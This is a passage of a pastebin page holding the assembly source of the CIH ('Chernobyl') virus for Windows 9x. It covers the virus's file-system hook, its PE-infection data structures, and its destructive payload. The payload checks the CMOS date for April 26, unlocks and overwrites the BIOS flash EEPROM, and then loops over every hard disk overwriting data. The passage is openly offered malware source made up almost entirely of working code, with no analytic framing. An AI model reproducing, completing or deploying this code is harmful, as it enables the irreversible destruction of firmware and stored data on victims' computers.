  861. call ebx ; VXDCall IFSMgr_Ring0_FileIO
  862. ; *************************************
  863. ; * Disable OnBusy *
  864. ; *************************************
  865. DisableOnBusy:
  866. dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
  867. ; *************************************
  868. ; * Call Previous FileSystemApiHook *
  869. ; *************************************
  870. prevhook:
  871. popad
  872. mov eax, dr0 ;
  873. jmp [eax] ; Jump to prevhook
  874. ; *************************************
  875. ; * Call the Function that the IFS *
  876. ; * Manager Would Normally Call to *
  877. ; * Implement this Particular I/O *
  878. ; * Request. *
  879. ; *************************************
  880. pIFSFunc:
  881. mov ebx, esp
  882. push dword ptr [ebx+20h+04h+14h] ; Push pioreq
  883. call [ebx+20h+04h] ; Call pIFSFunc
  884. pop ecx ;
  885. mov [ebx+1ch], eax ; Modify EAX Value in Stack
  886. ; ***************************
  887. ; * After Calling pIFSFunc, *
  888. ; * Get Some Data from the *
  889. ; * Returned pioreq. *
  890. ; ***************************
  891. cmp dword ptr [ebx+20h+04h+04h], 00000024h
  892. jne QuitMyVirusFileSystemHook
  893. ; *****************
  894. ; * Get the File *
  895. ; * Modification *
  896. ; * Date and Time *
  897. ; * in DOS Format.*
  898. ; *****************
  899. mov eax, [ecx+28h]
  900. mov (FileModificationTime-@6)[esi], eax
  901. ; ***************************
  902. ; * Quit My Virus' *
  903. ; * IFSMgr_FileSystemHook *
  904. ; ***************************
  905. QuitMyVirusFileSystemHook:
  906. popad
  907. ret
  908. ; *************************************
  909. ; * Kill Computer !? ... *^_^* *
  910. ; *************************************
  911. IsKillComputer:
  912. ; Get Now Month from BIOS CMOS
  913. mov ax, 0708h
  914. out 70h, al
  915. in al, 71h
  916. xchg ah, al
  917.  
  918. ; Get Now Day from BIOS CMOS
  919. out 70h, al
  920. in al, 71h
  921. xor ax, 0426h ; 04/26/????
  922. jne DisableOnBusy
  923. ; **************************************
  924. ; * Kill Kill Kill Kill Kill Kill Kill *
  925. ; **************************************
  926.  
  927. ; ***************************
  928. ; * Kill BIOS EEPROM *
  929. ; ***************************
  930. mov bp, 0cf8h
  931. lea esi, IOForEEPROM-@7[esi]
  932. ; ***********************
  933. ; * Show BIOS Page in *
  934. ; * 000E0000 - 000EFFFF *
  935. ; * ( 64 KB ) *
  936. ; ***********************
  937. mov edi, 8000384ch
  938. mov dx, 0cfeh
  939. cli
  940. call esi
  941. ; ***********************
  942. ; * Show BIOS Page in *
  943. ; * 000F0000 - 000FFFFF *
  944. ; * ( 64 KB ) *
  945. ; ***********************
  946. mov di, 0058h
  947. dec edx ; and al,0fh
  948. mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
  949. call esi
  950. ; ***********************
  951. ; * Show the BIOS Extra *
  952. ; * ROM Data in Memory *
  953. ; * 000E0000 - 000E01FF *
  954. ; * ( 512 Bytes ) *
  955. ; * , and the Section *
  956. ; * of Extra BIOS can *
  957. ; * be Writted... *
  958. ; ***********************
  959. lea ebx, EnableEEPROMToWrite-@10[esi]
  960. mov eax, 0e5555h
  961. mov ecx, 0e2aaah
  962. call ebx
  963. mov byte ptr [eax], 60h
  964. push ecx
  965. loop $
  966. ; ***********************
  967. ; * Kill the BIOS Extra *
  968. ; * ROM Data in Memory *
  969. ; * 000E0000 - 000E007F *
  970. ; * ( 80h Bytes ) *
  971. ; ***********************
  972. xor ah, ah
  973. mov [eax], al
  974. xchg ecx, eax
  975. loop $
  976. ; ***********************
  977. ; * Show and Enable the *
  978. ; * BIOS Main ROM Data *
  979. ; * 000E0000 - 000FFFFF *
  980. ; * ( 128 KB ) *
  981. ; * can be Writted... *
  982. ; ***********************
  983. mov eax, 0f5555h
  984. pop ecx
  985. mov ch, 0aah
  986. call ebx
  987. mov byte ptr [eax], 20h
  988. loop $
  989. ; ***********************
  990. ; * Kill the BIOS Main *
  991. ; * ROM Data in Memory *
  992. ; * 000FE000 - 000FE07F *
  993. ; * ( 80h Bytes ) *
  994. ; ***********************
  995. mov ah, 0e0h
  996. mov [eax], al
  997. ; ***********************
  998. ; * Hide BIOS Page in *
  999. ; * 000F0000 - 000FFFFF *
  1000. ; * ( 64 KB ) *
  1001. ; ***********************
  1002. ; or al,10h
  1003. mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
  1004. call esi
  1005. ; ***************************
  1006. ; * Kill All HardDisk *
  1007. ; ***************************************************
  1008. ; * IOR Structure of IOS_SendCommand Needs *
  1009. ; ***************************************************
  1010. ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
  1011. ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
  1012. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1013. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1014. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
  1015. ; ***************************************************
  1016. KillHardDisk:
  1017. xor ebx, ebx
  1018. mov bh, FirstKillHardDiskNumber
  1019. push ebx
  1020. sub esp, 2ch
  1021. push 0c0001000h
  1022. mov bh, 08h
  1023. push ebx
  1024. push ecx
  1025. push ecx
  1026. push ecx
  1027. push 40000501h
  1028. inc ecx
  1029. push ecx
  1030. push ecx
  1031. mov esi, esp
  1032. sub esp, 0ach
  1033. LoopOfKillHardDisk:
  1034. int 20h
  1035. dd 00100004h ; VXDCall IOS_SendCommand
  1036. cmp word ptr [esi+06h], 0017h
  1037. je KillNextDataSection
  1038. ChangeNextHardDisk:
  1039. inc byte ptr [esi+4dh]
  1040. jmp LoopOfKillHardDisk
  1041. KillNextDataSection:
  1042. add dword ptr [esi+10h], ebx
  1043. mov byte ptr [esi+4dh], FirstKillHardDiskNumber
  1044. jmp LoopOfKillHardDisk
  1045. ; ***************************
  1046. ; * Enable EEPROM to Write *
  1047. ; ***************************
  1048. EnableEEPROMToWrite:
  1049. mov [eax], cl
  1050. mov [ecx], al
  1051. mov byte ptr [eax], 80h
  1052. mov [eax], cl
  1053. mov [ecx], al
  1054. ret
  1055. ; ***************************
  1056. ; * IO for EEPROM *
  1057. ; ***************************
  1058. IOForEEPROM:
  1059. @10 = IOForEEPROM
  1060. xchg eax, edi
  1061. xchg edx, ebp
  1062. out dx, eax
  1063. xchg eax, edi
  1064. xchg edx, ebp
  1065. in al, dx
  1066. BooleanCalculateCode = $
  1067. or al, 44h
  1068. xchg eax, edi
  1069. xchg edx, ebp
  1070. out dx, eax
  1071. xchg eax, edi
  1072. xchg edx, ebp
  1073. out dx, al
  1074. ret
  1075. ; *********************************************************
  1076. ; * Static Data *
  1077. ; *********************************************************
  1078. LastVxDCallAddress = IFSMgr_Ring0_FileIO
  1079. VxDCallAddressTable db 00h
  1080. db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
  1081. db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
  1082. db IFSMgr_Ring0_FileIO-UniToBCSPath
  1083. VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
  1084. VxDCallTableSize = ($-VxDCallIDTable)/04h
  1085. ; *********************************************************
  1086. ; * Virus Version Copyright *
  1087. ; *********************************************************
  1088. VirusVersionCopyright db 'CIH v'
  1089. db MajorVirusVersion+'0'
  1090. db '.'
  1091. db MinorVirusVersion+'0'
  1092. db ' TTIT'
  1093. ; *********************************************************
  1094. ; * Virus Size *
  1095. ; *********************************************************
  1096. VirusSize = $
  1097. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1098. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1099. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1100. ; *********************************************************
  1101. ; * Dynamic Data *
  1102. ; *********************************************************
  1103. VirusGameDataStartAddress = VirusSize
  1104. @6 = VirusGameDataStartAddress
  1105. OnBusy db 0
  1106. FileModificationTime dd ?
  1107.  
  1108. FileNameBuffer db FileNameBufferSize dup(?)
  1109. @7 = FileNameBuffer
  1110.  
  1111. DataBuffer = $
  1112. @8 = DataBuffer
  1113. NumberOfSections dw ?
  1114. TimeDateStamp dd ?
  1115. SymbolsPointer dd ?
  1116. NumberOfSymbols dd ?
  1117. SizeOfOptionalHeader dw ?
  1118. _Characteristics dw ?
  1119. Magic dw ?
  1120. LinkerVersion dw ?
  1121. SizeOfCode dd ?
  1122. SizeOfInitializedData dd ?
  1123. SizeOfUninitializedData dd ?
  1124. AddressOfEntryPoint dd ?
  1125. BaseOfCode dd ?
  1126. BaseOfData dd ?
  1127. ImageBase dd ?
  1128. @9 = $
  1129. SectionAlignment dd ?
  1130. FileAlignment dd ?
  1131. OperatingSystemVersion dd ?
  1132. ImageVersion dd ?
  1133. SubsystemVersion dd ?
  1134. Reserved dd ?
  1135. SizeOfImage dd ?
  1136. SizeOfHeaders dd ?
  1137. SizeOfImageHeaderToRead = $-NumberOfSections
  1138.  
  1139. NewAddressOfEntryPoint = DataBuffer ; DWORD
  1140. SizeOfImageHeaderToWrite = 04h
  1141.  
  1142. StartOfSectionTable = @9
  1143. SectionName = StartOfSectionTable ; QWORD
  1144. VirtualSize = StartOfSectionTable+08h ; DWORD
  1145. VirtualAddress = StartOfSectionTable+0ch ; DWORD
  1146. SizeOfRawData = StartOfSectionTable+10h ; DWORD
  1147. PointerToRawData = StartOfSectionTable+14h ; DWORD
  1148. PointerToRelocations = StartOfSectionTable+18h ; DWORD
  1149. PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
  1150. NumberOfRelocations = StartOfSectionTable+20h ; WORD
  1151. NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
  1152. Characteristics = StartOfSectionTable+24h ; DWORD
  1153. SizeOfScetionTable = Characteristics+04h-SectionName
  1154. ; *********************************************************
  1155. ; * Virus Total Need Memory *
  1156. ; *********************************************************
  1157. VirusNeedBaseMemory = $
  1158. VirusTotalNeedMemory = @9
  1159. ; + NumberOfSections(??)*SizeOfScetionTable(28h)
  1160. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1161. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1162. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1163. ; *********************************************************
  1164. VirusGame ENDS
  1165. END FileHeader
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!